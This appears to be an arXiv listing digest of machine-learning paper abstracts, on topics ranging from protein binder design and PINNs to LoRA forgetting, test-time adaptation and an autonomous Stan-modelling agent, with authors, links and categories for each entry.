Abstract:We introduce AI-Kolmogorov, a novel framework for Symbolic Density Estimation (SymDE). Symbolic regression (SR) has been effectively used to produce interpretable models in standard regression settings but its applicability to density estimation tasks has largely been unexplored. To address the SymDE task we introduce a multi-stage pipeline: (i) problem decomposition through clustering and/or probabilistic graphical model structure learning; (ii) nonparametric density estimation; (iii) support estimation; and finally (iv) SR on the density estimate. We demonstrate the efficacy of AI-Kolmogorov on synthetic mixture models, multivariate normal distributions, and three exotic distributions, two of which are motivated by applications in high-energy physics. We show that AI-Kolmogorov can discover underlying distributions or otherwise provide valuable insight into the mathematical expressions describing them.
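Two of the pipeline stages above, nonparametric density estimation (ii) and symbolic regression on the estimate (iv), can be sketched end to end on a Gaussian sample. As a stand-in for full SR we fit the log-density over a tiny fixed basis by least squares; the bandwidth, grid, and basis are our illustrative choices, not AI-Kolmogorov's:

```python
import numpy as np

rng = np.random.default_rng(1)
x = rng.normal(loc=2.0, scale=1.0, size=5000)   # samples from N(2, 1)

# (ii) Nonparametric density estimate: a simple Gaussian KDE on a grid.
grid = np.linspace(-1, 5, 200)
bw = 0.2
dens = np.mean(np.exp(-0.5 * ((grid[:, None] - x[None, :]) / bw) ** 2), axis=1)
dens /= bw * np.sqrt(2 * np.pi)

# (iv) Symbolic-regression stand-in: fit log p(x) = a*x^2 + b*x + c by
# least squares. For a Gaussian the true coefficients are
# a = -1/(2*sigma^2) = -0.5 and b = mu/sigma^2 = 2 (up to KDE smoothing).
A = np.stack([grid ** 2, grid, np.ones_like(grid)], axis=1)
coef, *_ = np.linalg.lstsq(A, np.log(dens + 1e-12), rcond=None)
a, b, c = coef
```

A real SR stage would search over a space of expressions rather than a fixed quadratic basis, and the full pipeline additionally performs decomposition (i) and support estimation (iii) first.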
[LG-49] Scaling Atomistic Protein Binder Design with Generative Pretraining and Test-Time Compute ICLR2026
链接: https://arxiv.org/abs/2603.27950
作者: Kieran Didi,Zuobai Zhang,Guoqing Zhou,Danny Reidenbach,Zhonglin Cao,Sooyoung Cha,Tomas Geffner,Christian Dallago,Jian Tang,Michael M. Bronstein,Martin Steinegger,Emine Kucukbenli,Arash Vahdat,Karsten Kreis
类目: Machine Learning (cs.LG)
*备注: ICLR 2026 Oral Presentation. Project page: this https URL
Abstract:Protein interaction modeling is central to protein design, which has been transformed by machine learning with applications in drug discovery and beyond. In this landscape, structure-based de novo binder design is cast as either conditional generative modeling or sequence optimization via structure predictors (“hallucination”). We argue that this is a false dichotomy and propose Proteina-Complexa, a novel fully atomistic binder generation method unifying both paradigms. We extend recent flow-based latent protein generation architectures and leverage the domain-domain interactions of monomeric computationally predicted protein structures to construct Teddymer, a new large-scale dataset of synthetic binder-target pairs for pretraining. Combined with high-quality experimental multimers, this enables training a strong base model. We then perform inference-time optimization with this generative prior, unifying the strengths of previously distinct generative and hallucination methods. Proteina-Complexa sets a new state of the art in computational binder design benchmarks: it delivers markedly higher in-silico success rates than existing generative approaches, and our novel test-time optimization strategies greatly outperform previous hallucination methods under normalized compute budgets. We also demonstrate interface hydrogen bond optimization, fold class-guided binder generation, and extensions to small molecule targets and enzyme design tasks, again surpassing prior methods. Code, models and new data will be publicly released.
[LG-50] Deflation-PINNs: Learning Multiple Solutions for PDEs and Landau-de Gennes
链接: https://arxiv.org/abs/2603.27936
作者: Sean Disarò,Ruma Rani Maity,Aras Bacho
类目: Numerical Analysis (math.NA); Machine Learning (cs.LG)
*备注:
Abstract:Nonlinear Partial Differential Equations (PDEs) are ubiquitous in mathematical physics and engineering. Although Physics-Informed Neural Networks (PINNs) have emerged as a powerful tool for solving PDE problems, they typically struggle to identify multiple distinct solutions, since they are designed to find one solution at a time. To address this limitation, we introduce Deflation-PINNs, a novel framework that integrates a deflation loss with an architecture based on PINNs and Deep Operator Networks (DeepONets). By incorporating a deflation term into the loss function, our method systematically forces the Deflation-PINN to seek and converge upon finitely many distinct solution branches. We provide theoretical evidence on the convergence of our model and demonstrate the efficacy of Deflation-PINNs through numerical experiments on the Landau-de Gennes model of liquid crystals, a system renowned for its complex energy landscape and multiple equilibrium states. Our results show that Deflation-PINNs can successfully identify and characterize multiple distinct crystal structures.
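The deflation idea is easiest to see on a scalar toy problem: after gradient descent finds one root of f(x) = (x² − 1)², the loss is multiplied by a deflation factor 1/(x − root)² + 1 that blows up near the found root, so the same optimizer rediscovers the other root. The deflation exponent, shift, and learning rate below are our illustrative choices, and the deflated gradient uses the algebraic simplification f(x)/(x − 1)² = (x + 1)² valid at root1 = 1:

```python
import numpy as np

def grad_descent(grad, x0, lr=0.01, steps=4000):
    """Plain gradient descent with a fixed step size."""
    x = x0
    for _ in range(steps):
        x -= lr * grad(x)
    return x

# Base loss f(x) = (x^2 - 1)^2 has roots at +1 and -1.
f_grad = lambda x: 4.0 * x * (x ** 2 - 1.0)
root1 = grad_descent(f_grad, x0=0.5)               # descends to +1

# Deflated loss g(x) = f(x) * (1/(x - root1)^2 + 1); with root1 = 1 this
# simplifies to (x + 1)^2 * (1 + (x - 1)^2), whose gradient is below.
g_grad = lambda x: 2.0 * (x + 1.0) * ((x - root1) ** 2 + x ** 2)
root2 = grad_descent(g_grad, x0=0.5)               # pushed away, finds -1
```

The same initial point yields a different solution once the first branch is deflated, which is the mechanism Deflation-PINNs apply to the PINN loss over function space.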
[LG-51] Data is All You Need: Markov Chain Car-Following (MC-CF) Model
链接: https://arxiv.org/abs/2603.27909
作者: Sungyong Chung,Yanlin Zhang,Nachuan Li,Dana Monzer,Alireza Talebpour
类目: Systems and Control (eess.SY); Machine Learning (cs.LG); Robotics (cs.RO)
*备注:
Abstract:Car-following behavior is fundamental to traffic flow theory, yet traditional models often fail to capture the stochasticity of naturalistic driving. This paper introduces a new car-following modeling category called the empirical probabilistic paradigm, which bypasses conventional parametric assumptions. Within this paradigm, we propose the Markov Chain Car-Following (MC-CF) model, which represents state transitions as a Markov process and predicts behavior by randomly sampling accelerations from empirical distributions within discretized state bins. Evaluation of the MC-CF model trained on the Waymo Open Motion Dataset (WOMD) demonstrates that its variants significantly outperform physics-based models including IDM, Gipps, FVDM, and SIDM in both one-step and open-loop trajectory prediction accuracy. Statistical analysis of transition probabilities confirms that the model-generated trajectories are indistinguishable from real-world behavior, successfully reproducing the probabilistic structure of naturalistic driving across all interaction types. Zero-shot generalization on the Naturalistic Phoenix (PHX) dataset further confirms the model’s robustness. Finally, microscopic ring road simulations validate the framework’s scalability. By incrementally integrating unconstrained free-flow trajectories and high-speed freeway data (TGSIM) alongside a conservative inference strategy, the model drastically reduces collisions, achieving zero crashes in multiple equilibrium and shockwave scenarios, while successfully reproducing naturalistic and stochastic shockwave propagation. Overall, the proposed MC-CF model provides a robust, scalable, and calibration-free foundation for high-fidelity stochastic traffic modeling, uniquely suited for the data-rich future of intelligent transportation.
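The core of the empirical probabilistic paradigm, discretizing the car-following state into bins and sampling accelerations from the empirical distribution observed in each bin, can be sketched in a few lines. This uses only two state features (speed and gap) with illustrative bin widths; the full model conditions on a richer state:

```python
import numpy as np
from collections import defaultdict

class MarkovChainCarFollowing:
    """Bin (speed, gap) states and sample accelerations from the
    empirical distribution observed in each bin (a two-feature
    sketch of the MC-CF idea; bin widths are illustrative)."""

    def __init__(self, speed_bin=2.0, gap_bin=5.0):
        self.speed_bin, self.gap_bin = speed_bin, gap_bin
        self.table = defaultdict(list)       # bin key -> observed accels

    def _key(self, speed, gap):
        return (int(speed // self.speed_bin), int(gap // self.gap_bin))

    def fit(self, speeds, gaps, accels):
        for s, g, a in zip(speeds, gaps, accels):
            self.table[self._key(s, g)].append(a)

    def sample(self, speed, gap, rng):
        return rng.choice(self.table[self._key(speed, gap)])

model = MarkovChainCarFollowing()
model.fit(speeds=[10.1, 10.4, 21.0], gaps=[12.0, 13.5, 30.0],
          accels=[0.3, -0.1, 0.8])
a = model.sample(speed=10.2, gap=12.7, rng=np.random.default_rng(0))
```

Because predictions are draws rather than point estimates, repeated rollouts reproduce the stochastic spread of naturalistic driving, which is what the transition-probability analysis in the abstract verifies.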
[LG-52] ATLAS-RTC: Closing the Loop on LLM Agent Output with Token-Level Runtime Control
链接: https://arxiv.org/abs/2603.27905
作者: Christopher Cruz
类目: Machine Learning (cs.LG)
*备注:
Abstract:We present ATLAS-RTC, a runtime control system for autoregressive language models that enforces structured output during decoding. ATLAS-RTC monitors generation at each step, detects drift from output contracts using lightweight signals, and applies targeted interventions such as biasing, masking, and rollback. Unlike post-hoc validation or static constrained decoding, it operates in a closed loop, enabling correction before errors materialize. Across structured generation and tool-calling tasks, ATLAS-RTC improves first-attempt success rates by 20 to 37.8 percentage points, with up to 88% latency reduction in failure-dominated settings. Results show that many failures arise from decoding artifacts rather than task misunderstanding, motivating runtime control as a distinct layer in LLM systems.
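Of the interventions named above, masking is the simplest to sketch: at each decoding step, tokens the output contract forbids are removed from the logits before selection. The toy vocabulary, "model", and digit-only contract below are entirely our own; ATLAS-RTC's actual drift signals, biasing, and rollback are richer than this:

```python
import numpy as np

VOCAB = list("0123456789abc,")            # toy vocabulary

def decode_with_mask(logits_fn, allowed_fn, steps):
    """Greedy decoding, but at each step tokens the contract forbids
    are masked to -inf before the argmax (token-level control)."""
    out = []
    for _ in range(steps):
        logits = logits_fn(out)
        mask = np.array([allowed_fn(tok, out) for tok in VOCAB])
        logits = np.where(mask, logits, -np.inf)   # hard intervention
        out.append(VOCAB[int(np.argmax(logits))])
    return "".join(out)

# A "model" that prefers letters, decoded under a digits-only contract.
rng = np.random.default_rng(0)
prefer_letters = lambda out: (np.array([3.0 if t.isalpha() else 1.0 for t in VOCAB])
                              + rng.normal(0, 0.1, len(VOCAB)))
digits_only = lambda tok, out: tok.isdigit()
s = decode_with_mask(prefer_letters, digits_only, steps=5)
```

The model's preferred letters never appear in the output, illustrating how errors are prevented during decoding rather than caught by post-hoc validation.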
[LG-53] Spectral Signatures of Data Quality: Eigenvalue Tail Index as a Diagnostic for Label Noise in Neural Networks
链接: https://arxiv.org/abs/2603.27885
作者: Matthew Loftus
类目: Machine Learning (cs.LG)
*备注: 8 pages, 2 figures, 5 tables
Abstract:We investigate whether spectral properties of neural network weight matrices can predict test accuracy. Under controlled label noise variation, the tail index alpha of the eigenvalue distribution at the network’s bottleneck layer predicts test accuracy with leave-one-out R^2 = 0.984 (21 noise levels, 3 seeds per level), far exceeding all baselines: the best conventional metric (Frobenius norm of the optimal layer) achieves LOO R^2 = 0.149. This relationship holds across three architectures (MLP, CNN, ResNet-18) and two datasets (MNIST, CIFAR-10). However, under hyperparameter variation at fixed data quality (180 configurations varying width, depth, learning rate, and weight decay), all spectral and conventional measures are weak predictors (R^2 < 0.25), with simple baselines (global L_2 norm, LOO R^2 = 0.219) slightly outperforming spectral measures (tail alpha, LOO R^2 = 0.167). We therefore frame the tail index as a data quality diagnostic: a powerful detector of label corruption and training set degradation, rather than a universal generalization predictor. A noise detector calibrated on synthetic noise successfully identifies real human annotation errors in CIFAR-10N (9% noise detected with 3% error). We identify the information-processing bottleneck layer as the locus of this signature and connect the observations to the BBP phase transition in spiked random matrix models. We also report a negative result: the level spacing ratio r is uninformative for weight matrices due to Wishart universality.
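A tail index like alpha is commonly estimated with the Hill estimator on the largest eigenvalues; the paper's exact fitting procedure may differ, so the sketch below validates the estimator on synthetic Pareto data with a known tail index rather than on a trained network. In practice one would apply it to the eigenvalues of WᵀW/n for the bottleneck-layer weight matrix W:

```python
import numpy as np

def hill_tail_index(values, k):
    """Hill estimator of the power-law tail index alpha from the
    k largest values of a sample."""
    x = np.sort(np.asarray(values))[::-1]
    return k / np.sum(np.log(x[:k] / x[k]))

# Sanity check on a known heavy tail: classic Pareto with alpha = 3.
rng = np.random.default_rng(0)
eigs = 1.0 + rng.pareto(3.0, size=10000)   # Pareto(alpha=3, x_m=1) samples
alpha_hat = hill_tail_index(eigs, k=1000)  # should be close to 3
```

The choice of k trades bias against variance (standard error roughly alpha/sqrt(k)); diagnostics like this are what make the fitted alpha usable as a data-quality signal.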
[LG-54] Near-Optimal Primal-Dual Algorithm for Learning Linear Mixture CMDPs with Adversarial Rewards
链接: https://arxiv.org/abs/2603.27884
作者: Kihyun Yu,Seoungbin Bae,Dabeen Lee
类目: Machine Learning (cs.LG); Optimization and Control (math.OC)
*备注:
Abstract:We study safe reinforcement learning in finite-horizon linear mixture constrained Markov decision processes (CMDPs) with adversarial rewards under full-information feedback and an unknown transition kernel. We propose a primal-dual policy optimization algorithm that achieves regret and constraint violation bounds of \widetilde{O}(\sqrt{d^2 H^3 K}) under mild conditions, where d is the feature dimension, H is the horizon, and K is the number of episodes. To the best of our knowledge, this is the first provably efficient algorithm for linear mixture CMDPs with adversarial rewards. In particular, our regret bound is near-optimal, matching the known minimax lower bound up to logarithmic factors. The key idea is to introduce a regularized dual update that enables a drift-based analysis. This step is essential, as strong duality-based analysis cannot be directly applied when reward functions change across episodes. In addition, we extend weighted ridge regression-based parameter estimation to the constrained setting, allowing us to construct tighter confidence intervals that are crucial for deriving the near-optimal regret bound.
[LG-55] Stability and Sensitivity Analysis of Relative Temporal-Difference Learning: Extended Version
链接: https://arxiv.org/abs/2603.27874
作者: Masoud S. Sakha,Rushikesh Kamalapurkar,Sean Meyn
类目: Machine Learning (cs.LG); Optimization and Control (math.OC)
*备注: Extended version for submission to the 2026 IEEE CDC
Abstract:Relative temporal-difference (TD) learning was introduced to mitigate the slow convergence of TD methods when the discount factor approaches one by subtracting a baseline from the temporal-difference update. While this idea has been studied in the tabular setting, stability guarantees with function approximation remain poorly understood. This paper analyzes relative TD learning with linear function approximation. We establish stability conditions for the algorithm and show that the choice of baseline distribution plays a central role. In particular, when the baseline is chosen as the empirical distribution of the state-action process, the algorithm is stable for any non-negative baseline weight and any discount factor. We also provide a sensitivity analysis of the resulting parameter estimates, characterizing both asymptotic bias and covariance. The asymptotic covariance and asymptotic bias are shown to remain uniformly bounded as the discount factor approaches one.
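The baseline-subtraction idea can be sketched as a TD(0) update with linear features in which a baseline average value, weighted by a coefficient kappa, is subtracted from the target. This generic form and the two-state test chain are our own illustration; the paper's precise relative TD formulation and its stability conditions are more general:

```python
import numpy as np

def relative_td_step(theta, phi_s, phi_s2, r, phi_bar, gamma=0.99,
                     kappa=1.0, lr=0.05):
    """One baseline-subtracted TD(0) update with linear value
    V(s) = phi(s) @ theta. The term kappa * (phi_bar @ theta) is the
    baseline, with phi_bar the average feature under a baseline
    distribution (here: the empirical state distribution)."""
    delta = (r + gamma * (phi_s2 @ theta)
             - kappa * (phi_bar @ theta) - phi_s @ theta)
    return theta + lr * delta * phi_s

# Deterministic two-state chain s0 <-> s1 with rewards 1 and 0.
phis = np.eye(2)                 # one-hot (tabular) features
phi_bar = phis.mean(axis=0)      # empirical baseline distribution
theta = np.zeros(2)
for t in range(2000):
    s, s2 = t % 2, (t + 1) % 2
    theta = relative_td_step(theta, phis[s], phis[s2],
                             r=float(s == 0), phi_bar=phi_bar)
```

Even with the discount factor at 0.99, the iterates stay bounded because the baseline term anchors the overall level of the value estimates, which is the effect the paper's analysis quantifies as the discount factor approaches one.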
[LG-56] jaxsgp4: GPU-accelerated mega-constellation propagation with batch parallelism
链接: https://arxiv.org/abs/2603.27830
作者: Charlotte Priestley,Will Handley
类目: Distributed, Parallel, and Cluster Computing (cs.DC); Earth and Planetary Astrophysics (astro-ph.EP); Instrumentation and Methods for Astrophysics (astro-ph.IM); Machine Learning (cs.LG)
*备注: 11 pages, 3 figures
Abstract:As the population of anthropogenic space objects transitions from sparse clusters to mega-constellations exceeding 100,000 satellites, traditional orbital propagation techniques face a critical bottleneck. Standard CPU-bound implementations of the Simplified General Perturbations 4 (SGP4) algorithm are less well suited to handle the requisite scale of collision avoidance and Space Situational Awareness (SSA) tasks. This paper introduces jaxsgp4, an open-source high-performance reimplementation of SGP4 utilising the JAX library. JAX has gained traction in the landscape of computational research, offering an easy mechanism for Just-In-Time (JIT) compilation, automatic vectorisation and automatic optimisation of code for CPU, GPU and TPU hardware modalities. By refactoring the algorithm into a pure functional paradigm, we leverage these transformations to execute massively parallel propagations on modern GPUs. We demonstrate that jaxsgp4 can propagate each of the 9,341 satellites in the Starlink constellation to 1,000 future time steps in under 4 ms on a single A100 GPU, representing a speedup of 1500× over traditional C++ baselines. Furthermore, we argue that the use of 32-bit precision for SGP4 propagation tasks offers a principled trade-off, accepting a negligible loss of precision for a substantial gain in throughput on hardware accelerators.
[LG-57] RG-TTA: Regime-Guided Meta-Control for Test-Time Adaptation in Streaming Time Series
链接: https://arxiv.org/abs/2603.27814
作者: Indar Kumar,Akanksha Tiwari,Sai Krishna Jasti,Ankit Hemant Lade
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: 18 pages, 8 figures
Abstract:Test-time adaptation (TTA) enables neural forecasters to adapt to distribution shifts in streaming time series, but existing methods apply the same adaptation intensity regardless of the nature of the shift. We propose Regime-Guided Test-Time Adaptation (RG-TTA), a meta-controller that continuously modulates adaptation intensity based on distributional similarity to previously-seen regimes. Using an ensemble of Kolmogorov-Smirnov, Wasserstein-1, feature-distance, and variance-ratio metrics, RG-TTA computes a similarity score for each incoming batch and uses it to (i) smoothly scale the learning rate – more aggressive for novel distributions, conservative for familiar ones – and (ii) control gradient effort via loss-driven early stopping rather than fixed budgets, allowing the system to allocate exactly the effort each batch requires. As a supplementary mechanism, RG-TTA gates checkpoint reuse from a regime memory, loading stored specialist models only when they demonstrably outperform the current model (loss improvement ≥ 30%). RG-TTA is model-agnostic and strategy-composable: it wraps any forecaster exposing train/predict/save/load interfaces and enhances any gradient-based TTA method. We demonstrate three compositions – RG-TTA, RG-EWC, and RG-DynaTTA – and evaluate 6 update policies (3 baselines + 3 regime-guided variants) across 4 compact architectures (GRU, iTransformer, PatchTST, DLinear), 14 datasets (6 real-world multivariate benchmarks + 8 synthetic regime scenarios), and 4 forecast horizons (96, 192, 336, 720) under a streaming evaluation protocol with 3 random seeds (672 experiments total). Regime-guided policies achieve the lowest MSE in 156 of 224 seed-averaged experiments (69.6%), with RG-EWC winning 30.4% and RG-TTA winning 29.0%. Overall, RG-TTA reduces MSE by 5.7% vs TTA while running 5.5% faster; RG-EWC reduces MSE by 14.1% vs standalone EWC.
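The similarity-to-learning-rate mapping can be sketched with two of the four metrics named above, the two-sample Kolmogorov-Smirnov statistic and the Wasserstein-1 distance, both easy to implement for 1D samples. The equal weighting, tanh squashing, and 10× maximum scale below are illustrative choices, not RG-TTA's calibrated ensemble:

```python
import numpy as np

def ks_statistic(a, b):
    """Two-sample Kolmogorov-Smirnov statistic (max ECDF gap)."""
    grid = np.concatenate([a, b])
    ca = np.searchsorted(np.sort(a), grid, side="right") / len(a)
    cb = np.searchsorted(np.sort(b), grid, side="right") / len(b)
    return np.max(np.abs(ca - cb))

def wasserstein1(a, b):
    """Wasserstein-1 distance for equal-size 1D samples (sorted matching)."""
    return np.mean(np.abs(np.sort(a) - np.sort(b)))

def adapted_lr(batch, reference, base_lr=1e-3, max_scale=10.0):
    """Scale the adaptation learning rate by distributional novelty:
    familiar batches keep base_lr, novel ones get up to max_scale times
    more (the metric weighting here is an illustrative choice)."""
    novelty = (0.5 * ks_statistic(batch, reference)
               + 0.5 * np.tanh(wasserstein1(batch, reference)))
    return base_lr * (1.0 + (max_scale - 1.0) * novelty)

rng = np.random.default_rng(0)
ref = rng.normal(0, 1, 512)        # a previously-seen regime
familiar = rng.normal(0, 1, 512)   # same distribution -> conservative LR
novel = rng.normal(5, 1, 512)      # shifted regime -> aggressive LR
```

An identical batch maps exactly to the base learning rate, while a strongly shifted one approaches the aggressive end of the range, which is the smooth modulation behavior (i) describes.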
[LG-58] AutoStan: Autonomous Bayesian Model Improvement via Predictive Feedback
链接: https://arxiv.org/abs/2603.27766
作者: Oliver Dürr
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:We present AutoStan, a framework in which a command-line interface (CLI) coding agent autonomously builds and iteratively improves Bayesian models written in Stan. The agent operates in a loop, writing a Stan model file, executing MCMC sampling, then deciding whether to keep or revert each change based on two complementary feedback signals: the negative log predictive density (NLPD) on held-out data and the sampler’s own diagnostics (divergences, R-hat, effective sample size). We evaluate AutoStan on five datasets with diverse modeling structures. On a synthetic regression dataset with outliers, the agent progresses from naive linear regression to a model with Student-t robustness, nonlinear heteroscedastic structure, and an explicit contamination mixture, matching or outperforming TabPFN, a state-of-the-art black-box method, while remaining fully interpretable. Across four additional experiments, the same mechanism discovers hierarchical partial pooling, varying-slope models with correlated random effects, and a Poisson attack/defense model for soccer. No search algorithm, critic module, or domain-specific instructions are needed. This is, to our knowledge, the first demonstration that a CLI coding agent can autonomously write and iteratively improve Stan code for diverse Bayesian modeling problems.
[LG-59] MTE: Effective Multimodal Graph Learning with Task-aware Modality and Topology Co-evolution
链接: https://arxiv.org/abs/2603.27723
作者: Yinlin Zhu,Xunkai Li,Di Wu,Wang Luo,Miao Hu,Di Wu
类目: Machine Learning (cs.LG)
*备注: Under Review
Abstract:Multimodal-attributed graphs (MAGs) are a fundamental data structure for multimodal graph learning (MGL), enabling both graph-centric and modality-centric tasks. However, our empirical analysis reveals inherent topology quality limitations in real-world MAGs, including noisy interactions, missing connections, and task-agnostic relational structures. A single graph derived from generic relationships is therefore unlikely to be universally optimal for diverse downstream tasks. To address this challenge, we propose Task-aware Modality and Topology co-Evolution (TMTE), a novel MGL framework that jointly and iteratively optimizes graph topology and multimodal representations toward the target task. TMTE is motivated by the bidirectional coupling between modality and topology: multimodal attributes induce relational structures, while graph topology shapes modality representations. Concretely, TMTE casts topology evolution as multi-perspective metric learning over modality embeddings with an anchor-based approximation, and formulates modality evolution as smoothness-regularized fusion with cross-modal alignment, yielding a closed-loop task-aware co-evolution process. Extensive experiments on 9 MAG datasets and 1 non-graph multimodal dataset across 6 graph-centric and modality-centric tasks show that TMTE consistently achieves state-of-the-art performance. Our code is available at this https URL.
[LG-60] Low-Rank Adaptation Reduces Catastrophic Forgetting in Sequential Transformer Encoder Fine-Tuning: Controlled Empirical Evidence and Frozen-Backbone Representation Probes
链接: https://arxiv.org/abs/2603.27707
作者: Ashish Pandey
类目: Machine Learning (cs.LG)
*备注: 14 pages, 11 figures, 4 tables. 234 experiments across BERT-base, RoBERTa-base, GPT-2. Submitted to TMLR
Abstract:Sequential fine-tuning of pretrained language encoders often overwrites previously acquired capabilities, but the forgetting behavior of parameter-efficient updates remains under-characterized. We present a controlled empirical study of Low-Rank Adaptation (LoRA) in sequential transformer encoder fine-tuning with companion representation probes that test a frozen-backbone explanation of its robustness. In five full-validation BERT-base reruns on an RTE-MRPC-CoLA-SST-2 sequence, full fine-tuning yields 19.9%+/-4.8% average forgetting, whereas standard LoRA (r=8, query/value modules) yields 0.6%+/-1.4% (paired t-test, p=0.002, Cohen’s d_s=3.12). Task-level analyses confirm this reduction is not merely an aggregate effect. Secondary experiments on RoBERTa-base show the same pattern, and the strongest EWC baseline remains at 15.5%+/-1.4% forgetting. A six-task extension reveals that low average forgetting can hide strong task-level heterogeneity. Fine-grained freezing ablations show a marked forgetting drop once frozen parameters exceed roughly 95%, with classifier-only and shallow-adapter baselines approaching LoRA. Companion task-similarity probes in GPT-2 and RoBERTa show the same directional story: frozen-backbone regimes preserve higher inter-task similarity than full fine-tuning, gradual unfreezing weakens stability, and full fine-tuning exhibits its clearest divergence at the final transformer layer. These results support a restrained mechanistic interpretation: LoRA helps largely because backbone freezing preserves a more stable shared feature scaffold. We position standard LoRA as both a strong empirical baseline for sequential encoder adaptation and a useful probe of how selective plasticity shapes interference in transformer continual learning.
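The low-rank mechanism the abstract links to reduced forgetting can be sketched in a few lines of NumPy (an illustrative toy with hypothetical shapes, not the paper's training setup): the pretrained weight W stays frozen, and only the rank-r factors A and B are updated, so the effective weight is W + BA.

```python
import numpy as np

# Toy LoRA update (hypothetical shapes, not the paper's setup): the frozen
# weight W is never modified; only the low-rank factors A and B are trained,
# so the effective weight is W + B @ A with rank at most r.
rng = np.random.default_rng(0)
d_out, d_in, r = 6, 4, 2

W = rng.standard_normal((d_out, d_in))     # frozen pretrained weight
A = rng.standard_normal((r, d_in)) * 0.01  # trainable down-projection
B = np.zeros((d_out, r))                   # trainable up-projection (zero init)

def forward(x):
    return (W + B @ A) @ x

x = rng.standard_normal(d_in)
# With B = 0 the adapted model matches the frozen backbone exactly.
assert np.allclose(forward(x), W @ x)

# A (mock) gradient step touches only B and A; W stays bit-identical, which
# is the "frozen feature scaffold" the abstract links to reduced forgetting.
B += 0.1 * rng.standard_normal((d_out, r))
assert np.linalg.matrix_rank(B @ A) <= r   # update confined to rank r
```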
[LG-61] Optimizing Coverage and Difficulty in Reinforcement Learning for Quiz Composition
链接: https://arxiv.org/abs/2603.27695
作者: Ricardo Pedro Querido Andrade Silva,Nassim Bouarour,Dina Fettache,Sarab Boussouar,Noha Ibrahim,Sihem Amer-Yahia
类目: Machine Learning (cs.LG)
*备注:
Abstract:Quiz design is a tedious process that teachers undertake to evaluate the acquisition of knowledge by students. Our goal in this paper is to automate quiz composition from a set of multiple choice questions (MCQs). We formalize a generic sequential decision-making problem with the goal of training an agent to compose a quiz that meets the desired topic coverage and difficulty levels. We investigate DQN, SARSA and A2C/A3C, three reinforcement learning solutions to solve our problem. We run extensive experiments on synthetic and real datasets that study the ability of RL to land on the best quiz. Our results reveal subtle differences in agent behavior and in transfer learning with different data distributions and teacher goals. This was supported by our user study, paving the way for automating various teachers’ pedagogical goals.
[LG-62] CrossHGL: A Text-Free Foundation Model for Cross-Domain Heterogeneous Graph Learning
链接: https://arxiv.org/abs/2603.27685
作者: Xuanze Chen,Jiajun Zhou,Yadong Li,Shanqing Yu,Qi Xuan
类目: Machine Learning (cs.LG)
*备注:
Abstract:Heterogeneous graph representation learning (HGRL) is essential for modeling complex systems with diverse node and edge types. However, most existing methods are limited to closed-world settings with shared schemas and feature spaces, hindering cross-domain generalization. While recent graph foundation models improve transferability, they often target homogeneous graphs, rely on domain-specific schemas, or require rich textual attributes. Consequently, text-free and few-shot cross-domain HGRL remains underexplored. To address this, we propose CrossHGL, a foundation framework that preserves and transfers multi-relational structural semantics without external textual supervision. Specifically, a semantic-preserving transformation strategy homogenizes heterogeneous graphs while encoding interaction semantics into edge features. Based on this, a prompt-aware multi-domain pre-training framework with a Tri-Prompt mechanism captures transferable knowledge across feature, edge, and structure perspectives via self-supervised contrastive learning. For target-domain adaptation, we develop a parameter-efficient fine-tuning strategy that freezes the pre-trained backbone and performs few-shot classification via prompt composition and prototypical learning. Experiments on node-level and graph-level tasks show that CrossHGL consistently outperforms state-of-the-art baselines, yielding average relative improvements of 25.1% and 7.6% in Micro-F1 for node and graph classification, respectively, while remaining competitive in challenging feature-degenerated settings.
[LG-63] Prototype-Aligned Federated Soft-Prompts for Continual Web Personalization WWW2026
链接: https://arxiv.org/abs/2603.27678
作者: Canran Xiao,Liwei Hou
类目: Machine Learning (cs.LG)
*备注: Accepted by WWW 2026
Abstract:Continual web personalization is essential for engagement, yet real-world non-stationarity and privacy constraints make it hard to adapt quickly without forgetting long-term preferences. We target this gap by seeking a privacy-conscious, parameter-efficient interface that controls stability-plasticity at the user/session level while tying user memory to a shared semantic prior. We propose ProtoFed-SP, a prompt-based framework that injects dual-timescale soft prompts into a frozen backbone: a fast, sparse short-term prompt tracks session intent, while a slow long-term prompt is anchored to a small server-side prototype library that is continually refreshed via differentially private federated aggregation. Queries are routed to Top-M prototypes to compose a personalized prompt. Across eight benchmarks, ProtoFed-SP improves NDCG@10 by +2.9% and HR@10 by +2.0% over the strongest baselines, with notable gains on Amazon-Books (+5.0% NDCG vs. INFER), HM (+2.5% vs. Dual-LoRA), and Taobao (+2.2% vs. FedRAP). It also lowers forgetting (AF) and Steps-to-95% and preserves accuracy under practical DP budgets. Our contribution is a unifying, privacy-aware prompting interface with prototype anchoring that delivers robust continual personalization and offers a transparent, controllable mechanism to balance stability and plasticity in deployment.
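The Top-M prototype routing step can be illustrated with a small NumPy sketch; the cosine-similarity metric, the shapes, and the mean-composition rule are assumptions for illustration, not the paper's exact design.

```python
import numpy as np

# Toy Top-M prototype routing: a query embedding is matched against a
# server-side prototype library, and the M closest prototypes are composed
# (here, averaged) into a personalized prompt.
def route_top_m(query, prototypes, m):
    q = query / np.linalg.norm(query)
    p = prototypes / np.linalg.norm(prototypes, axis=1, keepdims=True)
    sims = p @ q                              # cosine similarity per prototype
    top = np.argsort(sims)[-m:]               # indices of the M best matches
    return prototypes[top].mean(axis=0), top  # composed prompt + routing

rng = np.random.default_rng(5)
protos = rng.standard_normal((8, 4))               # prototype library
query = protos[3] + 0.01 * rng.standard_normal(4)  # query near prototype 3
prompt, chosen = route_top_m(query, protos, m=2)
assert 3 in chosen            # the nearest prototype is among those selected
```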
[LG-64] On the Asymptotics of Self-Supervised Pre-training: Two-Stage M-Estimation and Representation Symmetry
链接: https://arxiv.org/abs/2603.27631
作者: Mohammad Tinati,Stephen Tu
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Self-supervised pre-training, where large corpora of unlabeled data are used to learn representations for downstream fine-tuning, has become a cornerstone of modern machine learning. While a growing body of theoretical work has begun to analyze this paradigm, existing bounds leave open the question of how sharp the current rates are, and whether they accurately capture the complex interaction between pre-training and fine-tuning. In this paper, we address this gap by developing an asymptotic theory of pre-training via two-stage M-estimation. A key challenge is that the pre-training estimator is often identifiable only up to a group symmetry, a feature common in representation learning that requires careful treatment. We address this issue using tools from Riemannian geometry to study the intrinsic parameters of the pre-training representation, which we link with the downstream predictor through a notion of orbit-invariance, precisely characterizing the limiting distribution of the downstream test risk. We apply our main result to several case studies, including spectral pre-training, factor models, and Gaussian mixture models, and obtain substantial improvements in problem-specific factors over prior art when applicable.
